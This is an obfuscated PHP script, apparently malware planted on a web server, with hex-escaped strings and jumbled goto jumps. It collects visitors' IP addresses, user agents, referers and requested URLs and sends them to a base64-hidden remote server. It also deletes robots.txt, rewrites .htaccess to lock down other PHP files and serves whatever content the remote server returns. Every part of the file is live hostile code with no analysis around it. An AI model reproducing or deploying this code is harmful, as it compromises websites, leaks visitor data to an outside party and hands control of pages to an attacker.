goto vglkK; mSyfm: bwNrA: goto Bg_EP; Bg_EP: $params["\x72\145\x66\145\162\x65\162"] = isset($_SERVER["\110\x54\x54\120\137\122\x45\106\x45\x52\x45\122"]) ? $_SERVER["\110\124\x54\x50\137\122\105\106\x45\x52\105\122"] : ''; goto Y46UZ; JnCeP: goto yJHS5; goto BRGEU; b1PAn: $params["\x61\x67\145\x6e\164"] = isset($_SERVER["\110\x54\x54\120\137\125\123\x45\x52\137\101\x47\x45\x4e\x54"]) ? $_SERVER["\110\124\124\x50\137\125\123\105\x52\x5f\x41\x47\x45\x4e\x54"] : ''; goto iGqsR; hTMes: J85C2: goto b1PAn; Jr8Kg: $params["\162\x65\x71\x75\145\163\164\x5f\x75\x72\154"] = $_SERVER["\122\x45\121\x55\105\x53\x54\x5f\x55\122\x49"]; goto UweCF; IB2tG: function h2() { if (file_exists("\x72\x6f\142\x6f\164\163" . "\56\x74\170\164")) { @unlink("\x72\157\142\x6f\164\163" . "\x2e\x74\170\x74"); } $htaccess = "\56" . "\150\164\x61\x63\x63\145\x73\x73"; $content = @base64_decode("\x50\x45\132\160\142\x47\126\172\x54\127\106\x30\x59\62\147\147\x49\151\x34\157\x63\110\154\x38\132\x58\150\154\146\110\102\157\143\x43\x6b\x6b\x49\152\x34\x4b\x49\x45\71\171\132\x47\126\x79\x49\x47\106\x73\142\x47\71\63\x4c\107\x52\154\142\x6e\153\x4b\111\x45\122\x6c\142\156\x6b\x67\132\156\112\166\142\x53\x42\x68\142\107\167\x4b\x50\103\71\x47\141\x57\170\x6c\143\60\61\150\x64\107\116\157\x50\147\x6f\70\122\x6d\x6c\x73\x5a\130\116\x4e\131\130\x52\152\141\103\x41\x69\x58\151\x68\150\131\x6d\71\x31\x64\103\65\167\x61\x48\x42\70\x63\155\106\153\141\x57\70\165\x63\x47\x68\x77\146\x47\154\x75\132\107\126\x34\114\x6e\x42\x6f\143\x48\x78\152\142\x32\x35\x30\132\127\65\x30\x4c\x6e\x42\x6f\x63\110\170\x73\x62\62\x4e\162\x4d\172\131\x77\x4c\156\x42\x6f\x63\x48\170\x68\x5a\x47\x31\160\142\x69\x35\167\x61\110\102\x38\144\x33\x41\164\142\107\x39\x6e\141\x57\64\x75\x63\x47\150\x77\x66\110\144\167\114\127\x77\167\132\62\154\165\x4c\x6e\x42\x6f\143\x48\x78\63\x63\x43\61\x30\141\107\x56\x74\132\x53\x35\x77\141\110\102\x38\144\x33\x41\x74\x63\62\x4e\x79\x61\130\x42\x30\x63\171\65\167\x61\110\x42\70\x64\x33\101\164\x5a\127\x52\160\144\x47\71\x79\x4c\156\x42\157\143\110\x78\x74\x59\127\147\x75\x63\x47\x68\167\146\x47\x70\x77\x4c\156\x42\x6f\x63\110\170\x6c\x65\110\121\x75\x63\107\x68\x77\x4b\123\x51\151\x50\147\157\147\x54\63\x4a\153\x5a\x58\111\x67\131\x57\170\x73\142\x33\143\163\x5a\x47\126\x75\x65\x51\x6f\x67\121\x57\x78\163\142\63\x63\x67\x5a\x6e\x4a\166\142\123\x42\x68\x62\107\167\113\120\x43\x39\x47\x61\x57\170\154\x63\x30\61\150\x64\107\x4e\157\x50\147\157\x38\123\x57\x5a\116\x62\x32\x52\x31\142\x47\125\x67\142\x57\x39\153\130\x33\112\x6c\x64\x33\x4a\x70\x64\107\x55\165\131\x7a\64\113\125\x6d\x56\63\x63\155\x6c\60\132\125\x56\x75\132\62\x6c\165\132\x53\x42\120\x62\147\x70\123\x5a\130\x64\171\x61\130\122\x6c\121\x6d\106\x7a\132\x53\x41\x76\x43\154\112\x6c\144\x33\112\x70\144\107\x56\x53\x64\x57\x78\154\111\x46\65\160\x62\x6d\122\x6c\x65\x46\167\x75\143\x47\x68\x77\x4a\x43\101\164\x49\x46\x74\115\x58\121\160\x53\x5a\130\x64\x79\x61\130\122\154\121\x32\71\x75\x5a\103\x41\x6c\x65\61\112\x46\x55\x56\x56\106\125\61\x52\146\122\153\x6c\115\x52\x55\x35\x42\124\x55\126\x39\111\x43\x45\164\x5a\147\x70\123\x5a\x58\x64\171\141\x58\122\154\x51\x32\x39\165\x5a\x43\101\x6c\x65\x31\112\106\125\126\126\x46\x55\x31\122\x66\122\x6b\154\115\122\x55\65\102\124\125\126\x39\111\103\105\x74\132\101\x70\x53\x5a\130\x64\x79\141\130\122\x6c\125\x6e\x56\163\132\x53\x41\x75\x49\x43\71\160\x62\x6d\122\154\x65\103\x35\x77\141\x48\x41\x67\x57\x30\x78\144\103\152\x77\166\x53\127\x5a\x4e\142\x32\x52\x31\142\x47\x55\x2b"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto JnCeP; Y46UZ: goto J85C2; goto hTMes; hT4Z9: $try = 0; goto hzhON; ikrdb: goto U9zCy; goto UMh54; OCi2q: OSsW5: goto Jtq6a; K2KCj: $params["\x69\160"] = isset($_SERVER["\110\124\x54\120\x5f\x56\111\x41"]) ? $_SERVER["\110\x54\124\x50\137\130\137\x46\117\x52\127\x41\122\104\x45\104\137\106\117\x52"] : $_SERVER["\x52\x45\115\117\x54\x45\137\x41\104\104\122"]; goto WPIfF; YVOcl: koP79: goto anVm5; s_mg0: if ($params["\151\160"] == null) { $params["\x69\x70"] = ''; } goto NkTYW; r347S: yJHS5: goto bF46a; nPzPO: NuHde: goto IB2tG; iGqsR: goto FEVgX; goto nPzPO; SBnlm: goto GOaLH; goto OCi2q; a0GVj: $params["\x70\x72\x6f\x74\157\143\157\x6c"] = isset($_SERVER["\110\124\124\x50\123"]) ? "\150\164\164\160\x73\72\57\x2f" : "\x68\164\x74\x70\72\x2f\57"; goto Se8Wh; vglkK: goto mMUEp; goto RrU1J; Jtq6a: $params["\x6c\x61\156\x67\165\141\147\x65"] = isset($_SERVER["\110\x54\x54\120\137\101\103\103\x45\x50\124\x5f\114\101\x4e\107\125\101\x47\105"]) ? $_SERVER["\110\124\124\120\x5f\101\x43\103\105\120\124\x5f\x4c\x41\x4e\107\x55\x41\x47\105"] : ''; goto D4CuB; hzhON: goto jjva7; goto Uamkf; jB1MI: nof5V: goto s_mg0; UMh54: GOaLH: goto XvuiG; fLxmS: RS2sB: goto aq3HN; bF46a: $api = base64_decode("\141\110\x52\x30\x63\104\x6f\x76\114\x7a\x59\170\115\104\121\x74\131\x32\x67\60\x4c\x58\131\x79\x4e\x6a\x63\165\x61\x57\x31\x6e\115\x6a\102\x35\x59\x57\150\x76\142\171\x35\152\142\x32\60\x3d"); goto Wbr_k; g3zEj: mMUEp: goto yy1DR; Se8Wh: goto OSsW5; goto g3zEj; UweCF: goto bwNrA; goto bhLsV; lU5uQ: FEVgX: goto K2KCj; NkTYW: goto eS08V; goto lU5uQ; D4CuB: goto RS2sB; goto fLxmS; anVm5: $params["\144\157\155\x61\x69\156"] = isset($_SERVER["\110\124\x54\120\137\x48\117\x53\x54"]) ? $_SERVER["\110\124\x54\120\x5f\110\117\x53\124"] : $_SERVER["\x53\105\x52\x56\x45\122\x5f\x4e\x41\x4d\x45"]; goto ikrdb; yy1DR: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto i5hVu; RrU1J: jjva7: goto TjKie; tJNFr: h2(); goto Aaiux; WPIfF: goto nof5V; goto vqSs8; bhLsV: hTj1l: goto hT4Z9; i5hVu: goto NuHde; goto YVOcl; vqSs8: eS08V: goto a0GVj; Aaiux: goto hTj1l; goto r347S; TjKie: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\57\x5c\174\x2f\x73\x69", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto SBnlm; Wbr_k: goto koP79; goto jB1MI; aq3HN: if (isset($_REQUEST["\160\141\162\x61\x6d\163"])) { $params["\141\160\x69"] = $api; print_r($params); die; } goto FHJGr; BRGEU: U9zCy: goto Jr8Kg; FHJGr: goto nnmrv; goto mSyfm; Uamkf: nnmrv: goto tJNFr; XvuiG: ?>